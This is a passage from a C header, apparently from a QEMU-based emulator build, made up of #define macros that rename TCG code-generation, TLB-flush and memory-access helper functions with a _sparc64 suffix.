tcg_gen_sari_i32 tcg_gen_sari_i32_sparc64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc64 #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_sparc64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_sparc64 #define tcg_gen_div_i32 tcg_gen_div_i32_sparc64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_sparc64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_sparc64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_sparc64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_sparc64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_sparc64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_sparc64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_sparc64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_sparc64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_sparc64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_sparc64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_sparc64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_sparc64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_sparc64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_sparc64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_sparc64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_sparc64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_sparc64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_sparc64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_sparc64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_sparc64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_sparc64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_sparc64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_sparc64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_sparc64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_sparc64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_sparc64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_sparc64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_sparc64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_sparc64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_sparc64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_sparc64 #define tcg_gen_div_i64 tcg_gen_div_i64_sparc64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_sparc64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_sparc64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_sparc64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_sparc64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_sparc64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_sparc64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_sparc64 #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_sparc64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_sparc64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_sparc64 #define tcg_gen_not_i64 tcg_gen_not_i64_sparc64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_sparc64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_sparc64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_sparc64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_sparc64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_sparc64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_sparc64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_sparc64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_sparc64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_sparc64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_sparc64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_sparc64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_sparc64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_sparc64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_sparc64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_sparc64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_sparc64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_sparc64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_sparc64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_sparc64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_sparc64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_sparc64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_sparc64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_sparc64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_sparc64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_sparc64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_sparc64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_sparc64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_sparc64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_sparc64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_sparc64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_sparc64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_sparc64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_sparc64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_sparc64 #define tcg_gen_exit_tb tcg_gen_exit_tb_sparc64 #define tcg_gen_goto_tb tcg_gen_goto_tb_sparc64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_sparc64 #define check_exit_request check_exit_request_sparc64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_sparc64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_sparc64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_sparc64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_sparc64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_sparc64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_sparc64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_sparc64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_sparc64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_sparc64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_sparc64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_sparc64 #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_sparc64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_sparc64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_sparc64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_sparc64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_sparc64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_sparc64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_sparc64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_sparc64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_sparc64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_sparc64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_sparc64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_sparc64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_sparc64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_sparc64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_sparc64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_sparc64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_sparc64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_sparc64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_sparc64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_sparc64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_sparc64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_sparc64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_sparc64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_sparc64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_sparc64 #define simd_desc simd_desc_sparc64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_sparc64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_sparc64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_sparc64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_sparc64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_sparc64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_sparc64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_sparc64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_sparc64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_sparc64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_sparc64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_sparc64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_sparc64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_sparc64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_sparc64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_sparc64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_sparc64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_sparc64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_sparc64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_sparc64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_sparc64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_sparc64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_sparc64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_sparc64 #define tcg_gen_gvec_not tcg_gen_gvec_not_sparc64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_sparc64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_sparc64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_sparc64 #define tcg_gen_gvec_add tcg_gen_gvec_add_sparc64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_sparc64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_sparc64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_sparc64 #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_sparc64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_sparc64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_sparc64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_sparc64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_sparc64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_sparc64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_sparc64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_sparc64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_sparc64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_sparc64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_sparc64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_sparc64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_sparc64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_sparc64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_sparc64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_sparc64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_sparc64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_sparc64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_sparc64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_sparc64 #define tcg_gen_gvec_and tcg_gen_gvec_and_sparc64 #define tcg_gen_gvec_or tcg_gen_gvec_or_sparc64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_sparc64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_sparc64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_sparc64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_sparc64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_sparc64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_sparc64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_sparc64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_sparc64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_sparc64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_sparc64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_sparc64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_sparc64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_sparc64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_sparc64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_sparc64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_sparc64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_sparc64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_sparc64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_sparc64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_sparc64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_sparc64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_sparc64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_sparc64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_sparc64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_sparc64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_sparc64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_sparc64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_sparc64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_sparc64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_sparc64 #define vec_gen_2 vec_gen_2_sparc64 #define vec_gen_3 vec_gen_3_sparc64 #define vec_gen_4 vec_gen_4_sparc64 #define tcg_gen_mov_vec tcg_gen_mov_vec_sparc64 #define tcg_const_zeros_vec tcg_const_zeros_vec_sparc64 #define tcg_const_ones_vec tcg_const_ones_vec_sparc64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_sparc64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_sparc64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_sparc64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_sparc64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_sparc64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_sparc64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_sparc64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_sparc64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_sparc64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_sparc64 #define tcg_gen_ld_vec tcg_gen_ld_vec_sparc64 #define tcg_gen_st_vec tcg_gen_st_vec_sparc64 #define tcg_gen_stl_vec tcg_gen_stl_vec_sparc64 #define tcg_gen_and_vec tcg_gen_and_vec_sparc64 #define tcg_gen_or_vec tcg_gen_or_vec_sparc64 #define tcg_gen_xor_vec tcg_gen_xor_vec_sparc64 #define tcg_gen_andc_vec tcg_gen_andc_vec_sparc64 #define tcg_gen_orc_vec tcg_gen_orc_vec_sparc64 #define tcg_gen_nand_vec tcg_gen_nand_vec_sparc64 #define tcg_gen_nor_vec tcg_gen_nor_vec_sparc64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_sparc64 #define tcg_gen_not_vec tcg_gen_not_vec_sparc64 #define tcg_gen_neg_vec tcg_gen_neg_vec_sparc64 #define tcg_gen_abs_vec tcg_gen_abs_vec_sparc64 #define tcg_gen_shli_vec tcg_gen_shli_vec_sparc64 #define tcg_gen_shri_vec tcg_gen_shri_vec_sparc64 #define tcg_gen_sari_vec tcg_gen_sari_vec_sparc64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_sparc64 #define tcg_gen_add_vec tcg_gen_add_vec_sparc64 #define tcg_gen_sub_vec tcg_gen_sub_vec_sparc64 #define tcg_gen_mul_vec tcg_gen_mul_vec_sparc64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_sparc64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_sparc64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_sparc64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_sparc64 #define tcg_gen_smin_vec tcg_gen_smin_vec_sparc64 #define tcg_gen_umin_vec tcg_gen_umin_vec_sparc64 #define tcg_gen_smax_vec tcg_gen_smax_vec_sparc64 #define tcg_gen_umax_vec tcg_gen_umax_vec_sparc64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_sparc64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_sparc64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_sparc64 #define tcg_gen_shls_vec tcg_gen_shls_vec_sparc64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_sparc64 #define tcg_gen_sars_vec tcg_gen_sars_vec_sparc64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_sparc64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_sparc64 #define tb_htable_lookup tb_htable_lookup_sparc64 #define tb_set_jmp_target tb_set_jmp_target_sparc64 #define cpu_exec cpu_exec_sparc64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_sparc64 #define cpu_reloading_memory_map cpu_reloading_memory_map_sparc64 #define cpu_loop_exit cpu_loop_exit_sparc64 #define cpu_loop_exit_restore cpu_loop_exit_restore_sparc64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_sparc64 #define tlb_init tlb_init_sparc64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_sparc64 #define tlb_flush tlb_flush_sparc64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_sparc64 #define tlb_flush_all_cpus tlb_flush_all_cpus_sparc64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_sparc64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_sparc64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_sparc64 #define tlb_flush_page tlb_flush_page_sparc64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_sparc64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_sparc64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_sparc64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_sparc64 #define tlb_protect_code tlb_protect_code_sparc64 #define tlb_unprotect_code tlb_unprotect_code_sparc64 #define tlb_reset_dirty tlb_reset_dirty_sparc64 #define tlb_set_dirty tlb_set_dirty_sparc64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_sparc64 #define tlb_set_page tlb_set_page_sparc64 #define get_page_addr_code_hostp get_page_addr_code_hostp_sparc64 #define get_page_addr_code get_page_addr_code_sparc64 #define probe_access probe_access_sparc64 #define tlb_vaddr_to_host tlb_vaddr_to_host_sparc64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc64 #define helper_le_lduw_mmu helper_le_lduw_mmu_sparc64 #define helper_be_lduw_mmu helper_be_lduw_mmu_sparc64 #define helper_le_ldul_mmu helper_le_ldul_mmu_sparc64 #define helper_be_ldul_mmu helper_be_ldul_mmu_sparc64 #define helper_le_ldq_mmu helper_le_ldq_mmu_sparc64 #define helper_be_ldq_mmu helper_be_ldq_mmu_sparc64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_sparc64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_sparc64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_sparc64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_sparc64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_sparc64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_sparc64 #define cpu_ldub_data_ra cpu_ldub_data_ra_sparc64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_sparc64 #define cpu_lduw_data_ra cpu_lduw_data_ra_sparc64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_sparc64 #define cpu_ldl_data_ra cpu_ldl_data_ra_sparc64 #define cpu_ldq_data_ra cpu_ldq_data_ra_sparc64 #define cpu_ldub_data cpu_ldub_data_sparc64 #define cpu_ldsb_data cpu_ldsb_data_sparc64 #define cpu_lduw_data cpu_lduw_data_sparc64 #define cpu_ldsw_data cpu_ldsw_data_sparc64 #define cpu_ldl_data cpu_ldl_data_sparc64 #define cpu_ldq_data cpu_ldq_data_sparc64 #define helper_ret_stb_mmu helper_ret_stb_mmu_sparc64 #define helper_le_stw_mmu helper_le_stw_mmu_sparc64 #define helper_be_stw_mmu helper_be_stw_mmu_sparc64 #define helper_le_stl_mmu helper_le_stl_mmu_sparc64 #define helper_be_stl_mmu helper_be_stl_mmu_sparc64 #define helper_le_stq_mmu helper_le_stq_mmu_sparc64 #define helper_be_stq_mmu helper_be_stq_mmu_sparc64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_sparc64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_sparc64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_sparc64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_sparc64 #define cpu_stb_data_ra cpu_stb_data_ra_sparc64 #define cpu_stw_data_ra cpu_stw_data_ra_sparc64 #define cpu_stl_data_ra cpu_stl_data_ra_sparc64 #define cpu_stq_data_ra cpu_stq_data_ra_sparc64 #define cpu_stb_data cpu_stb_data_sparc64 #define cpu_stw_data cpu_stw_data_sparc64 #define cpu_stl_data cpu_stl_data_sparc64 #define cpu_stq_data cpu_stq_data_sparc64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_sparc64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_sparc64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_sparc64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_sparc64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_sparc64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_sparc64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_sparc64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_sparc64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_sparc64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_sparc64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_sparc64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_sparc64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_sparc64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_sparc64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_sparc64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_sparc64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_sparc64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_sparc64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_sparc64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_sparc64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_sparc64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_sparc64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_sparc64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_sparc64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_sparc64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_sparc64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_sparc64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_sparc64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_sparc64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_sparc64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_sparc64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_sparc64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_sparc64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_sparc64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_sparc64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_sparc64 #define helper_atomic_cmpxchgw_be_mmu 